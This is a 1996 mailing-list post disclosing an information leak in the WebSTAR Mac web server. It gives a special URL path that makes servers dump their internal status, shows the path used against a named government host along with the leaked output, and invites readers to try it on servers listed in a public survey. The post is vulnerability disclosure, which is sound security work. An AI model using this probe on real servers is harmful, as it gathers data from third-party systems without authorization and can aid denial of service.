From proff Fri Jul 12 11:42:38 1996 Received: (proff@localhost) by suburbia.net (8.7.4/Proff-950810) id LAA03294 for best-of-security; Fri, 12 Jul 1996 11:42:38 +1000 Received: from toad.com (toad.com [140.174.2.1]) by suburbia.net (8.7.4/Proff-950810) with ESMTP id LAA03264 for ; Fri, 12 Jul 1996 11:40:55 +1000 Received: (from majordom@localhost) by toad.com (8.7.5/8.7.3) id OAA14238 for cypherpunks-outgoing; Thu, 11 Jul 1996 14:45:49 -0700 (PDT) Received: from www.clever.net (root@www.clever.net [207.15.222.251]) by toad.com (8.7.5/8.7.3) with ESMTP id OAA14233 for ; Thu, 11 Jul 1996 14:45:41 -0700 (PDT) Received: from [204.249.244.13] ([204.249.244.13]) by www.clever.net (8.7.3/8.6.9) with ESMTP id RAA16288 for ; Thu, 11 Jul 1996 17:46:47 -0400 (EDT) Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Date: Thu, 11 Jul 1996 17:44:15 -0300 To: cypherpunks@toad.com From: Cyberdog Subject: New Mac Web Server Security Hole Discovered Sender: proff Precedence: bulk Try adding /M_A_C_H_T_T_P_V_E_R_S_I_O_N to any of the URL's at http://www.netcraft.co.uk/Survey/Reports/960701/ALL/WebSTAR.html and each server will leak information like --- http://europa.nadc.navy.mil//M_A_C_H_T_T_P_V_E_R_S_I_O_N --- WebSTAR, Copyright =A91995 Chuck Shotton, Portions =A91995 StarNine Technologies, Inc. and its Licensors. All rights reserved. PowerPC (CW) version totalCon 343, maxCon 30, listening 29, current 1, high 8, busy 0, denied 0, timeout 0, maxMem 1140640, currMem 1117024, minMem 1090208, bytesSent 1218888, port 80, maxTimeout 300, verboseMessages false, disableLogging false, hideWindow false, refuseConnections false, upSince 07/11/96:10:48, version 1.2.5(PowerPC (CW)) -- Anyone can use this for denial of service becase this backdoor is so well hidden it won't show up in the logs! The vendor has not commited to an instant fix, but they have told their users not to discuss this on public lists lest their obscurity become unsecure. p.s. The copyright part was their lawyer's idea!